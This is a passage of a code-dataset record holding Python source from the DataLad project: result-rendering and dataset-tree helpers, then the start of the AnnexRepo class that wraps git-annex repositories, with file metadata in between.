Does nothing if `None`.\n mode : {'fail', 'ignore', 'save-before'}\n How to act upon discovering unsaved changes.\n msg : str or None\n Custom message to use for a potential commit.\n\n Returns\n -------\n None\n \"\"\"\n if ds is None:\n # nothing to be handled\n return\n if msg is None:\n msg = '[DATALAD] auto-saved changes'\n\n # make sure that all pending changes (batched annex operations, etc.)\n # are actually reflected in Git\n if ds.repo:\n ds.repo.precommit()\n\n if mode == 'ignore':\n return\n elif mode == 'fail':\n if not ds.repo or ds.repo.dirty:\n raise RuntimeError('dataset {} has unsaved changes'.format(ds))\n elif mode == 'save-before':\n if not ds.is_installed():\n raise RuntimeError('dataset {} is not yet installed'.format(ds))\n from datalad.core.local.save import Save\n Save.__call__(dataset=ds, message=msg, updated=True)\n else:\n raise ValueError(\"unknown if-dirty mode '{}'\".format(mode))\n\n\ndef get_tree_roots(paths):\n \"\"\"Return common root paths for a set of paths\n\n This function determines the smallest set of common root\n paths and sorts all given paths under the respective\n root.\n\n Returns\n -------\n dict\n paths by root\n \"\"\"\n paths_ws = [_with_sep(p) for p in paths]\n # sort all paths under their potential roots\n roots = {}\n # start from the top to get all paths down the line\n # and collate them into as few roots as possible\n for s in sorted(paths_ws):\n if any([s.startswith(r) for r in roots]):\n # this path is already covered by a known root\n continue\n # find all sub paths\n subs = [p for p in paths if p.startswith(s)]\n roots[s.rstrip(sep)] = subs\n return roots\n\n\n# TODO(OPT)? YOH: from a cursory review seems like possibly an expensive function\n# whenever many paths were provided (e.g. via shell glob).\n# Might be worth testing on some usecase and py-spy'ing if notable portion\n# of time is spent.\ndef discover_dataset_trace_to_targets(basepath, targetpaths, current_trace,\n spec, includeds=None):\n \"\"\"Discover the edges and nodes in a dataset tree to given target paths\n\n Parameters\n ----------\n basepath : path\n Path to a start or top-level dataset. Really has to be a path to a\n dataset!\n targetpaths : list(path)\n Any non-zero number of paths that are termination points for the\n search algorithm. Can be paths to datasets, directories, or files\n (and any combination thereof).\n current_trace : list\n For a top-level call this should probably always be `[]`\n spec : dict\n `content_by_ds`-style dictionary that will receive information about the\n discovered datasets. Specifically, for each discovered dataset there\n will be an item with its path under the key (path) of the respective\n superdataset.\n includeds : sequence, optional\n Any paths given are treated as existing subdatasets, regardless of\n whether they can be found in the filesystem. 
Such subdatasets will appear\n under the key of the closest existing dataset in the `spec`.\n\n Returns\n -------\n None\n Function calls itself recursively and populates `spec` dict in-place.\n Keys are dataset paths, values are sets of subdataset paths\n \"\"\"\n # convert to set for faster lookup\n includeds = includeds if isinstance(includeds, set) else \\\n set() if includeds is None else set(includeds)\n # this beast walks the directory tree from a given `basepath` until\n # it discovers any of the given `targetpaths`\n # if it finds one, it commits any accummulated trace of visited\n # datasets on this edge to the spec\n valid_repo = GitRepo.is_valid_repo(basepath)\n if valid_repo:\n # we are passing into a new dataset, extend the dataset trace\n current_trace = current_trace + [basepath]\n # this edge is not done, we need to try to reach any downstream\n # dataset\n undiscovered_ds = set(t for t in targetpaths) # if t != basepath)\n # whether anything in this directory matched a targetpath\n filematch = False\n if isdir(basepath):\n for p in listdir(basepath):\n p = ensure_unicode(opj(basepath, p))\n if not isdir(p):\n if p in targetpaths:\n filematch = True\n # we cannot have anything below this one\n continue\n # OPT listdir might be large and we could have only few items\n # in `targetpaths` -- so traverse only those in spec which have\n # leading dir basepath\n # filter targets matching this downward path\n downward_targets = set(\n t for t in targetpaths if path_startswith(t, p))\n if not downward_targets:\n continue\n # remove the matching ones from the \"todo\" list\n undiscovered_ds.difference_update(downward_targets)\n # go one deeper\n discover_dataset_trace_to_targets(\n p, downward_targets, current_trace, spec,\n includeds=includeds if not includeds else includeds.intersection(\n downward_targets))\n undiscovered_ds = [t for t in undiscovered_ds\n if includeds and\n path_is_subpath(t, current_trace[-1]) and\n t in includeds]\n if filematch or basepath in targetpaths or undiscovered_ds:\n for i, p in enumerate(current_trace[:-1]):\n # TODO RF prepare proper annotated path dicts\n subds = spec.get(p, set())\n subds.add(current_trace[i + 1])\n spec[p] = subds\n if undiscovered_ds:\n spec[current_trace[-1]] = spec.get(current_trace[-1], set()).union(\n undiscovered_ds)\n\n\ndef get_result_filter(fx):\n \"\"\"Wrap a filter into a helper to be able to accept additional\n arguments, if the filter doesn't support it already\"\"\"\n _fx = fx\n if fx and not getargspec(fx).keywords:\n def _fx(res, **kwargs):\n return fx(res)\n return _fx\n\n\ndef eval_results(wrapped):\n import warnings\n from datalad.interface.base import eval_results as eval_results_moved\n warnings.warn(\"datalad.interface.utils.eval_results is obsolete. \"\n \"Use datalad.interface.base.eval_results instead\",\n DeprecationWarning)\n return eval_results_moved(wrapped)\n\n\ndef generic_result_renderer(res):\n if res.get('status', None) != 'notneeded':\n path = res.get('path', None)\n if path and res.get('refds'):\n try:\n path = relpath(path, res['refds'])\n except ValueError:\n # can happen, e.g., on windows with paths from different\n # drives. 
just go with the original path in this case\n pass\n ui.message('{action}({status}):{path}{type}{msg}{err}'.format(\n action=ac.color_word(\n res.get('action', '<action-unspecified>'),\n ac.BOLD),\n status=ac.color_status(res.get('status', '<status-unspecified>')),\n path=' {}'.format(path) if path else '',\n type=' ({})'.format(\n ac.color_word(res['type'], ac.MAGENTA)\n ) if 'type' in res else '',\n msg=' [{}]'.format(\n res['message'][0] % res['message'][1:]\n if isinstance(res['message'], tuple) else res[\n 'message'])\n if res.get('message', None) else '',\n err=ac.color_word(' [{}]'.format(\n res['error_message'][0] % res['error_message'][1:]\n if isinstance(res['error_message'], tuple) else res[\n 'error_message']), ac.RED)\n if res.get('error_message', None) and res.get('status', None) != 'ok' else ''))\n\n\n# keep for legacy compatibility\ndefault_result_renderer = generic_result_renderer\n\n\ndef render_action_summary(action_summary):\n ui.message(\"action summary:\\n {}\".format(\n '\\n '.join('{} ({})'.format(\n act,\n ', '.join('{}: {}'.format(status, action_summary[act][status])\n for status in sorted(action_summary[act])))\n for act in sorted(action_summary))))\n\n\ndef _display_suppressed_message(nsimilar, ndisplayed, last_ts, final=False):\n # +1 because there was the original result + nsimilar displayed.\n n_suppressed = nsimilar - ndisplayed + 1\n if n_suppressed > 0:\n ts = time()\n # rate-limit update of suppression message, with a large number\n # of fast-paced results updating for each one can result in more\n # CPU load than the actual processing\n # arbitrarily go for a 2Hz update frequency -- it \"feels\" good\n if last_ts is None or final or (ts - last_ts > 0.5):\n ui.message(' [{} similar {} been suppressed; disable with datalad.ui.suppress-similar-results=off]'\n .format(n_suppressed,\n single_or_plural(\"message has\",\n \"messages have\",\n n_suppressed, False)),\n cr=\"\\n\" if final else \"\\r\")\n return ts\n return last_ts\n\n\ndef _process_results(\n results,\n cmd_class,\n on_failure,\n action_summary,\n incomplete_results,\n result_renderer,\n result_log_level,\n allkwargs):\n # private helper pf @eval_results\n # loop over results generated from some source and handle each\n # of them according to the requested behavior (logging, rendering, ...)\n\n # used to track repeated messages in the generic renderer\n last_result = None\n # the timestamp of the last renderer result\n last_result_ts = None\n # counter for detected repetitions\n last_result_reps = 0\n # how many repetitions to show, before suppression kicks in\n render_n_repetitions = \\\n dlcfg.obtain('datalad.ui.suppress-similar-results-threshold') \\\n if sys.stdout.isatty() \\\n and dlcfg.obtain('datalad.ui.suppress-similar-results') \\\n else float(\"inf\")\n\n for res in results:\n if not res or 'action' not in res:\n # XXX Yarik has to no clue on how to track the origin of the\n # record to figure out WTF, so he just skips it\n # but MIH thinks leaving a trace of that would be good\n lgr.debug('Drop result record without \"action\": %s', res)\n continue\n\n actsum = action_summary.get(res['action'], {})\n if res['status']:\n actsum[res['status']] = actsum.get(res['status'], 0) + 1\n action_summary[res['action']] = actsum\n ## log message, if there is one and a logger was given\n msg = res.get('message', None)\n # remove logger instance from results, as it is no longer useful\n # after logging was done, it isn't serializable, and generally\n # pollutes the output\n res_lgr = 
res.pop('logger', None)\n if msg and res_lgr:\n if isinstance(res_lgr, logging.Logger):\n # didn't get a particular log function, go with default\n res_lgr = getattr(\n res_lgr,\n default_logchannels[res['status']]\n if result_log_level == 'match-status'\n else result_log_level)\n msg = res['message']\n msgargs = None\n if isinstance(msg, tuple):\n msgargs = msg[1:]\n msg = msg[0]\n if 'path' in res:\n # result path could be a path instance\n path = str(res['path'])\n if msgargs:\n # we will pass the msg for %-polation, so % should be doubled\n path = path.replace('%', '%%')\n msg = '{} [{}({})]'.format(\n msg, res['action'], path)\n if msgargs:\n # support string expansion of logging to avoid runtime cost\n try:\n res_lgr(msg, *msgargs)\n except TypeError as exc:\n raise TypeError(\n \"Failed to render %r with %r from %r: %s\"\n % (msg, msgargs, res, str(exc))\n ) from exc\n else:\n res_lgr(msg)\n\n ## output rendering\n if result_renderer is None or result_renderer == 'disabled':\n pass\n elif result_renderer == 'generic':\n last_result_reps, last_result, last_result_ts = \\\n _render_result_generic(\n res, render_n_repetitions,\n last_result_reps, last_result, last_result_ts)\n elif result_renderer in ('json', 'json_pp'):\n _render_result_json(res, result_renderer.endswith('_pp'))\n elif result_renderer == 'tailored':\n cmd_class.custom_result_renderer(res, **allkwargs)\n elif hasattr(result_renderer, '__call__'):\n _render_result_customcall(res, result_renderer, allkwargs)\n else:\n raise ValueError(f'unknown result renderer \"{result_renderer}\"')\n\n ## error handling\n # looks for error status, and report at the end via\n # an exception\n if on_failure in ('continue', 'stop') \\\n and res['status'] in ('impossible', 'error'):\n incomplete_results.append(res)\n if on_failure == 'stop':\n # first fail -> that's it\n # raise will happen after the loop\n break\n yield res\n # make sure to report on any issues that we had suppressed\n _display_suppressed_message(\n last_result_reps, render_n_repetitions, last_result_ts, final=True)\n\n\ndef _render_result_generic(\n res, render_n_repetitions,\n # status vars\n last_result_reps, last_result, last_result_ts):\n # which result dict keys to inspect for changes to discover repetitions\n # of similar messages\n repetition_keys = set(('action', 'status', 'type', 'refds'))\n\n trimmed_result = {k: v for k, v in res.items() if k in repetition_keys}\n if res.get('status', None) != 'notneeded' \\\n and trimmed_result == last_result:\n # this is a similar report, suppress if too many, but count it\n last_result_reps += 1\n if last_result_reps < render_n_repetitions:\n generic_result_renderer(res)\n else:\n last_result_ts = _display_suppressed_message(\n last_result_reps, render_n_repetitions, last_result_ts)\n else:\n # this one is new, first report on any prev. 
suppressed results\n # by number, and then render this fresh one\n last_result_ts = _display_suppressed_message(\n last_result_reps, render_n_repetitions, last_result_ts,\n final=True)\n generic_result_renderer(res)\n last_result_reps = 0\n return last_result_reps, trimmed_result, last_result_ts\n\n\ndef _render_result_json(res, prettyprint):\n ui.message(json.dumps(\n {k: v for k, v in res.items()\n if k not in ('logger')},\n sort_keys=True,\n indent=2 if prettyprint else None,\n default=str))\n\n\ndef _render_result_customcall(res, result_renderer, allkwargs):\n try:\n result_renderer(res, **allkwargs)\n except Exception as e:\n lgr.warning('Result rendering failed for: %s [%s]',\n res, CapturedException(e))\n\n\ndef keep_result(res, rfilter, **kwargs):\n if not rfilter:\n return True\n try:\n if not rfilter(res, **kwargs):\n # give the slightest indication which filter was employed\n raise ValueError(\n 'excluded by filter {} with arguments {}'.format(rfilter, kwargs))\n except ValueError as e:\n # make sure to report the excluded result to massively improve\n # debugging experience\n lgr.debug('Not reporting result (%s): %s', CapturedException(e), res)\n return False\n return True\n\n\ndef xfm_result(res, xfm):\n if not xfm:\n return res\n\n return xfm(res)\n" }, { "alpha_fraction": 0.5485745668411255, "alphanum_fraction": 0.5524276494979858, "avg_line_length": 38.03797149658203, "blob_id": "534053043536d406a271dafb421ba6832083456d", "content_id": "d6f28026ca00583e4deae12008a9e14eb02fb3d0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 159353, "license_type": "permissive", "max_line_length": 167, "num_lines": 4082, "path": "/datalad/support/annexrepo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interface to git-annex by Joey Hess.\n\nFor further information on git-annex see https://git-annex.branchable.com/.\n\n\"\"\"\n\nimport json\nimport logging\nimport os\nimport re\nimport warnings\nfrom itertools import chain\nfrom multiprocessing import cpu_count\nfrom os import linesep\nfrom os.path import (\n curdir,\n exists,\n isdir,\n)\nfrom os.path import join as opj\nfrom os.path import (\n lexists,\n normpath,\n)\nfrom typing import Dict\nfrom weakref import (\n WeakValueDictionary,\n finalize,\n)\n\nimport datalad.utils as ut\nfrom datalad.cmd import ( # KillOutput,\n BatchedCommand,\n GitWitlessRunner,\n SafeDelCloseMixin,\n StdOutCapture,\n StdOutErrCapture,\n WitlessProtocol,\n)\nfrom datalad.consts import WEB_SPECIAL_REMOTE_UUID\n# imports from same module:\nfrom datalad.dataset.repo import RepoInterface\nfrom datalad.dochelpers import (\n borrowdoc,\n borrowkwargs,\n)\nfrom datalad.log import log_progress\nfrom datalad.runner.protocol import GeneratorMixIn\nfrom datalad.runner.utils import (\n AssemblingDecoderMixIn,\n LineSplitter,\n)\n\nfrom datalad.support.annex_utils import (\n _fake_json_for_non_existing,\n _get_non_existing_from_annex_output,\n _sanitize_key,\n)\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.ui import ui\nfrom datalad.utils import (\n 
Path,\n PurePosixPath,\n auto_repr,\n ensure_list,\n on_windows,\n split_cmdline,\n unlink,\n)\n\nfrom .exceptions import (\n AccessDeniedError,\n AccessFailedError,\n AnnexBatchCommandError,\n CommandError,\n CommandNotAvailableError,\n DirectModeNoLongerSupportedError,\n FileInGitError,\n FileNotInAnnexError,\n IncompleteResultsError,\n InsufficientArgumentsError,\n InvalidAnnexRepositoryError,\n InvalidGitRepositoryError,\n MissingExternalDependency,\n NoSuchPathError,\n OutdatedExternalDependency,\n OutOfSpaceError,\n RemoteNotAvailableError,\n)\nfrom .external_versions import external_versions\nfrom .gitrepo import (\n GitRepo,\n normalize_path,\n normalize_paths,\n to_options,\n)\n\nlgr = logging.getLogger('datalad.annex')\n\n\nclass AnnexRepo(GitRepo, RepoInterface):\n \"\"\"Representation of an git-annex repository.\n\n Paths given to any of the class methods will be interpreted as relative\n to PWD, in case this is currently beneath AnnexRepo's base dir\n (`self.path`). If PWD is outside of the repository, relative paths\n will be interpreted as relative to `self.path`. Absolute paths will be\n accepted either way.\n \"\"\"\n\n # Begin Flyweight:\n _unique_instances = WeakValueDictionary()\n\n def _flyweight_invalid(self):\n return not self.is_valid_annex(allow_noninitialized=True)\n\n # End Flyweight:\n\n # Web remote UUID, kept here for backward compatibility\n WEB_UUID = WEB_SPECIAL_REMOTE_UUID\n\n # To be assigned and checked to be good enough upon first call to AnnexRepo\n # 6.20160923 -- --json-progress for get\n # 6.20161210 -- annex add to add also changes (not only new files) to git\n # 6.20170220 -- annex status provides --ignore-submodules\n # 6.20180416 -- annex handles unicode filenames more uniformly\n # 6.20180913 -- annex fixes all known to us issues for v6\n # 7 -- annex makes v7 mode default on crippled systems. We demand it for consistent operation\n # 7.20190503 -- annex introduced mimeencoding support needed for our text2git\n #\n # When bumping this, check whether datalad.repo.version needs to be\n # adjusted.\n GIT_ANNEX_MIN_VERSION = '8.20200309'\n git_annex_version = None\n supports_direct_mode = None\n repository_versions = None\n _version_kludges = {}\n\n def __init__(self, path, runner=None,\n backend=None, always_commit=True,\n create=True, create_sanity_checks=True,\n init=False, batch_size=None, version=None, description=None,\n git_opts=None, annex_opts=None, annex_init_opts=None,\n repo=None, fake_dates=False):\n \"\"\"Creates representation of git-annex repository at `path`.\n\n AnnexRepo is initialized by giving a path to the annex.\n If no annex exists at that location, a new one is created.\n Optionally give url to clone from.\n\n Parameters\n ----------\n path: str\n Path to git-annex repository. In case it's not an absolute path, it's\n relative to PWD\n runner: Runner, optional\n Provide a Runner in case AnnexRepo shall not create it's own.\n This is especially needed in case of desired dry runs.\n backend: str, optional\n Set default backend used by this annex. This does NOT affect files,\n that are already annexed nor will it automatically migrate files,\n hat are 'getted' afterwards.\n create: bool, optional\n Create and initialize an annex repository at path, in case\n there is none. 
If set to False, and this repository is not an annex\n repository (initialized or not), an exception is raised.\n create_sanity_checks: bool, optional\n Passed to GitRepo.\n init: bool, optional\n Initialize git-annex repository (run \"git annex init\") if path is an\n annex repository which just was not yet initialized by annex (e.g. a\n fresh git clone). Note that if `create=True`, then initialization\n would happen\n batch_size: int, optional\n If specified and >0, instructs annex to batch this many commands before\n annex adds acts on git repository (e.g. adds them them to index for addurl).\n version: int, optional\n If given, pass as --version to `git annex init`\n description: str, optional\n Short description that humans can use to identify the\n repository/location, e.g. \"Precious data on my laptop\"\n \"\"\"\n\n # BEGIN Repo validity test\n # We want to fail early for tests, that would be performed a lot. In particular this is about\n # AnnexRepo.is_valid_repo. We would use the latter to decide whether or not to call AnnexRepo() only for\n # __init__ to then test the same things again. If we fail early we can save the additional test from outer\n # scope.\n do_init = False\n super(AnnexRepo, self).__init__(\n path, runner=runner,\n create=create, create_sanity_checks=create_sanity_checks,\n repo=repo, git_opts=git_opts, fake_dates=fake_dates)\n\n # Check whether an annex already exists at destination\n # XXX this doesn't work for a submodule!\n\n # NOTE: We are in __init__ here and already know that GitRepo.is_valid_git is True, since super.__init__ was\n # called. Therefore: check_git=False\n if not self.is_valid_annex(check_git=False):\n # so either it is not annex at all or just was not yet initialized\n # TODO: There's still potential to get a bit more performant. is_with_annex() is checking again, what\n # is_valid_annex did. However, this marginal here, considering the call to git-annex-init.\n if self.is_with_annex():\n # it is an annex repository which was not initialized yet\n if create or init:\n lgr.debug('Annex repository was not yet initialized at %s.'\n ' Initializing ...' % self.path)\n do_init = True\n elif create:\n lgr.debug('Initializing annex repository at %s...', self.path)\n do_init = True\n else:\n raise InvalidAnnexRepositoryError(\"No annex found at %s.\" % self.path)\n\n # END Repo validity test\n\n # initialize\n self._uuid = None\n self._annex_common_options = [\"-c\", \"annex.dotfiles=true\"]\n\n if annex_opts or annex_init_opts:\n lgr.warning(\"TODO: options passed to git-annex and/or \"\n \"git-annex-init are currently ignored.\\n\"\n \"options received:\\n\"\n \"git-annex: %s\\ngit-annex-init: %s\" %\n (annex_opts, annex_init_opts))\n\n # Below was initially introduced for setting for direct mode workaround,\n # where we changed _GIT_COMMON_OPTIONS and had to avoid passing\n # --worktree=. -c core.bare=False to git annex commands, so for their\n # invocation we kept and used pristine version of the\n # common options. 
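
As a hedged illustration of the constructor parameters documented above (only `path`, `create`, `init`, `backend`, and `description` from the signature are used; the path, backend choice, and description text are invented for this sketch), a minimal usage might look like:

    from datalad.support.annexrepo import AnnexRepo

    # create-or-open an annex at a scratch location and initialize it right away
    repo = AnnexRepo('/tmp/demo-annex', create=True, init=True,
                     backend='MD5E', description='scratch annex for testing')
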
yoh thought it would be good to keep this as a copy\n # just in case we do need to pass annex specific options, even if\n # there is no need ATM\n self._ANNEX_GIT_COMMON_OPTIONS = self._GIT_COMMON_OPTIONS[:]\n self.always_commit = always_commit\n\n config = self.config\n if version is None:\n version = config.get(\"datalad.repo.version\", None)\n # we might get an empty string here\n # TODO: if we use obtain() instead, we get an error complaining\n # '' cannot be converted to int (via Constraint as defined for\n # \"datalad.repo.version\" in common_cfg\n # => Allow conversion to result in None?\n if version:\n try:\n version = int(version)\n except ValueError:\n # Just give a warning if things look off and let\n # git-annex-init complain if it can't actually handle it.\n lgr.warning(\n \"Expected an int for datalad.repo.version, got %s\",\n version)\n else:\n # The above comment refers to an empty string case. The commit\n # (f12eb03f40) seems to deal with direct mode, so perhaps this\n # isn't reachable anymore.\n version = None\n\n if do_init:\n self._init(version=version, description=description)\n\n # TODO: RM DIRECT eventually, but should remain while we have is_direct_mode\n self._direct_mode = None\n\n # Handle cases of detecting repositories with no longer supported\n # direct mode.\n # Could happen in case we didn't specify anything, but annex forced\n # direct mode due to FS or an already existing repo was in direct mode,\n if self._is_direct_mode_from_config():\n raise DirectModeNoLongerSupportedError(\n self,\n \"Git configuration reports repository being in direct mode\"\n )\n\n if config.getbool(\"datalad\", \"repo.direct\", default=False):\n raise DirectModeNoLongerSupportedError(\n self,\n \"datalad.repo.direct configuration instructs to use direct mode\"\n )\n\n self._batched = BatchedAnnexes(\n batch_size=batch_size, git_options=self._ANNEX_GIT_COMMON_OPTIONS)\n\n # set default backend for future annex commands:\n # TODO: Should the backend option of __init__() also migrate\n # the annex, in case there are annexed files already?\n if backend:\n self.set_default_backend(backend, persistent=True)\n\n # will be evaluated lazily\n self._n_auto_jobs = None\n\n # Finally, register a finalizer (instead of having a __del__ method).\n # This will be called by garbage collection as well as \"atexit\". By\n # keeping the reference here, we can also call it explicitly.\n # Note, that we can pass required attributes to the finalizer, but not\n # `self` itself. This would create an additional reference to the object\n # and thereby preventing it from being collected at all.\n self._finalizer = finalize(self, AnnexRepo._cleanup, self.path,\n self._batched)\n\n def set_default_backend(self, backend, persistent=True, commit=True):\n \"\"\"Set default backend\n\n Parameters\n ----------\n backend : str\n persistent : bool, optional\n If persistent, would add/commit to .gitattributes. 
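
A short usage sketch for the two persistence modes described in this docstring, assuming `repo` is the AnnexRepo instance from the earlier sketch and 'SHA256E' is just an example backend name:

    # record the default backend in .gitattributes and commit that change
    repo.set_default_backend('SHA256E', persistent=True, commit=True)
    # or keep the setting local to this clone (.git/config) only
    repo.set_default_backend('SHA256E', persistent=False)
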
If not -- would\n set within .git/config\n \"\"\"\n if persistent:\n # could be set in .gitattributes or $GIT_DIR/info/attributes\n if 'annex.backend' in self.get_gitattributes('.')['.']:\n lgr.debug(\n \"Not (re)setting backend since seems already set in git attributes\"\n )\n else:\n lgr.debug(\"Setting annex backend to %s (persistently)\", backend)\n git_attributes_file = '.gitattributes'\n self.set_gitattributes(\n [('*', {'annex.backend': backend})],\n git_attributes_file)\n self.add(git_attributes_file, git=True)\n if commit:\n self.commit(\n \"Set default backend for all files to be %s\" % backend,\n _datalad_msg=True,\n files=[git_attributes_file]\n )\n else:\n lgr.debug(\"Setting annex backend to %s (in .git/config)\", backend)\n self.config.set('annex.backend', backend, scope='local')\n\n @classmethod\n def _cleanup(cls, path, batched):\n\n lgr.log(1, \"Finalizer called on: AnnexRepo(%s)\", path)\n\n # Ben: With switching to finalize rather than del, I think the\n # safe_del_debug isn't needed anymore. However, time will tell and\n # it doesn't hurt.\n\n def safe__del__debug(e):\n \"\"\"We might be too late in the game and either .debug or exc_str\n are no longer bound\"\"\"\n try:\n return lgr.debug(str(e))\n except (AttributeError, NameError):\n return\n\n try:\n if batched is not None:\n batched.close()\n except TypeError as e:\n # Workaround:\n # most likely something wasn't accessible anymore; doesn't really\n # matter since we wanted to delete it anyway.\n #\n # Nevertheless, in some cases might be an issue and it is a strange\n # thing to happen, since we check for things being None herein as\n # well as in super class __del__;\n # At least log it:\n safe__del__debug(e)\n\n def is_managed_branch(self, branch=None):\n \"\"\"Whether `branch` is managed by git-annex.\n\n ATM this returns True if on an adjusted branch of annex v6+ repository:\n either 'adjusted/my_branch(unlocked)' or 'adjusted/my_branch(fixed)'\n\n Note: The term 'managed branch' is used to make clear it's meant to be\n more general than the v6+ 'adjusted branch'.\n\n Parameters\n ----------\n branch: str\n name of the branch; default: active branch\n\n Returns\n -------\n bool\n True if on a managed branch, False otherwise\n \"\"\"\n\n if branch is None:\n branch = self.get_active_branch()\n # Note: `branch` might still be None, due to detached HEAD\n # (or no checkout at all)\n return (branch and branch.startswith('adjusted/'))\n\n def get_corresponding_branch(self, branch=None):\n \"\"\"Get the name of a potential corresponding branch.\n\n Parameters\n ----------\n branch: str, optional\n Name of the branch to report a corresponding branch for;\n defaults to active branch\n\n Returns\n -------\n str or None\n Name of the corresponding branch, or `None` if there is no\n corresponding branch.\n \"\"\"\n\n if branch is None:\n branch = self.get_active_branch()\n\n if self.is_managed_branch(branch):\n if branch.startswith('adjusted/'):\n if branch.endswith('(unlocked)'):\n cor_branch = branch[9:-10]\n elif branch.endswith('(fixed)'):\n cor_branch = branch[9:-7]\n else:\n cor_branch = branch[9:]\n lgr.warning(\"Unexpected naming of adjusted branch '%s'.%s\"\n \"Assuming '%s' to be the corresponding branch.\",\n branch, linesep, cor_branch)\n else:\n raise NotImplementedError(\n \"Detection of annex-managed branch '{}' follows a pattern \"\n \"not implemented herein.\".format(branch))\n return cor_branch\n\n else:\n return None\n\n def get_tracking_branch(self, branch=None, remote_only=False,\n 
corresponding=True):\n \"\"\"Get the tracking branch for `branch` if there is any.\n\n By default returns the tracking branch of the corresponding branch if\n `branch` is a managed branch.\n\n Parameters\n ----------\n branch: str\n local branch to look up. If none is given, active branch is used.\n remote_only : bool\n Don't return a value if the upstream remote is set to \".\" (meaning\n this repository).\n corresponding: bool\n If True actually look up the corresponding branch of `branch` (also if\n `branch` isn't explicitly given)\n\n Returns\n -------\n tuple\n (remote or None, refspec or None) of the tracking branch\n \"\"\"\n\n if branch is None:\n branch = self.get_active_branch()\n\n return super(AnnexRepo, self).get_tracking_branch(\n remote_only=remote_only,\n branch=(self.get_corresponding_branch(branch) or branch)\n if corresponding else branch)\n\n @classmethod\n def _check_git_annex_version(cls):\n ver = external_versions['cmd:annex']\n # in case it is missing\n msg = \"Visit http://handbook.datalad.org/r.html?install \" \\\n \"for instructions on how to install DataLad and git-annex.\"\n\n exc_kwargs = dict(\n name=\"git-annex\",\n msg=msg,\n ver=cls.GIT_ANNEX_MIN_VERSION\n )\n if not ver:\n raise MissingExternalDependency(**exc_kwargs)\n elif ver < cls.GIT_ANNEX_MIN_VERSION:\n raise OutdatedExternalDependency(ver_present=ver, **exc_kwargs)\n cls.git_annex_version = ver\n\n @classmethod\n def check_direct_mode_support(cls):\n \"\"\"Does git-annex version support direct mode?\n\n The result is cached at `cls.supports_direct_mode`.\n\n Returns\n -------\n bool\n \"\"\"\n if cls.supports_direct_mode is None:\n warnings.warn(\n \"DataLad's minimum git-annex version is above 7.20190912, \"\n \"the last version to support direct mode. \"\n \"The check_direct_mode_support method \"\n \"and supports_direct_mode attribute will be removed \"\n \"in an upcoming release.\",\n DeprecationWarning)\n cls.supports_direct_mode = False\n return cls.supports_direct_mode\n\n @classmethod\n def check_repository_versions(cls):\n \"\"\"Get information on supported and upgradable repository versions.\n\n The result is cached at `cls.repository_versions`.\n\n Returns\n -------\n dict\n supported -> list of supported versions (int)\n upgradable -> list of upgradable versions (int)\n \"\"\"\n if cls.repository_versions is None:\n key_remap = {\n \"supported repository versions\": \"supported\",\n \"upgrade supported from repository versions\": \"upgradable\"}\n out = GitWitlessRunner().run(\n [\"git\", \"annex\", \"version\"],\n protocol=StdOutErrCapture)\n kvs = (ln.split(\":\", 1) for ln in out['stdout'].splitlines())\n cls.repository_versions = {\n key_remap[k]: list(map(int, v.strip().split()))\n for k, v in kvs if k in key_remap}\n return cls.repository_versions\n\n @classmethod\n def _check_version_kludges(cls, key):\n \"\"\"Cache some annex-version-specific kludges in one go.\n\n Return the kludge under `key`.\n \"\"\"\n kludges = cls._version_kludges\n if kludges:\n return kludges[key]\n\n if cls.git_annex_version is None:\n cls._check_git_annex_version()\n\n ver = cls.git_annex_version\n kludges[\"fromkey-supports-unlocked\"] = ver > \"8.20210428\"\n # applies to get, drop, move, copy, whereis\n kludges[\"grp1-supports-batch-keys\"] = ver >= \"8.20210903\"\n # applies to find, findref to list all known.\n # was added in 10.20221212-17-g0b2dd374d on 20221220.\n kludges[\"find-supports-anything\"] = ver >= \"10.20221213\"\n # applies to log, unannex and may be other commands,\n # was added 
10.20230407 release, respecting core.quotepath\n kludges[\"quotepath-respected\"] = \\\n \"yes\" if ver >= '10.20230408' else \\\n \"maybe\" if ver > '10.20230407' else \\\n \"no\"\n cls._version_kludges = kludges\n return kludges[key]\n\n @classmethod\n def _unquote_annex_path(cls, s):\n \"\"\"Remove surrounding \"\" around the filename, and unquote \\\"\n\n This is minimal necessary transformation of the quoted filename in care of\n core.quotepath=false, i.e. whenever all unicode characters remain as is.\n\n All interfaces should aim to operate on --json machine readable output,\n so we are not striving to have it super efficient here since should not be used\n often.\n \"\"\"\n respected = cls._check_version_kludges('quotepath-respected')\n if respected == 'no':\n return s\n quoted = s.startswith('\"') and s.endswith('\"')\n if respected in ('maybe', 'yes'):\n # not necessarily correct if e.g. filename has \"\" around it originally\n # but this is a check only for a range of development versions, so mostly\n # for local/CI runs ATM\n if not quoted:\n return s\n else:\n raise RuntimeError(f\"Got unknown {respected}\")\n return s[1:-1].replace(r'\\\"', '\"')\n\n @staticmethod\n def get_size_from_key(key):\n \"\"\"A little helper to obtain size encoded in a key\n\n Returns\n -------\n int or None\n size of the file or None if either no size is encoded in the key or\n key was None itself\n\n Raises\n ------\n ValueError\n if key is considered invalid (at least its size-related part)\n \"\"\"\n if not key:\n return None\n\n # see: https://git-annex.branchable.com/internals/key_format/\n key_parts = key.split('--')\n key_fields = key_parts[0].split('-')\n parsed = {field[0]: int(field[1:]) if field[1:].isdigit() else None\n for field in key_fields[1:]\n if field[0] in \"sSC\"}\n\n # don't lookup the dict for the same things several times;\n # Is there a faster (and more compact) way of doing this? 
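
To make the size/chunk fields concrete, a few illustrative calls (the keys are made up; the return values follow the parsing logic laid out in this method):

    from datalad.support.annexrepo import AnnexRepo

    AnnexRepo.get_size_from_key(None)                                 # None: nothing to report
    AnnexRepo.get_size_from_key('SHA256E-s1000--deadbeef.nii.gz')     # 1000: plain sized key
    AnnexRepo.get_size_from_key('SHA256E-s4000-S1000-C2--deadbeef')   # 1000: a full chunk
    AnnexRepo.get_size_from_key('SHA256E-s3500-S1000-C4--deadbeef')   # 500: the final partial chunk
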
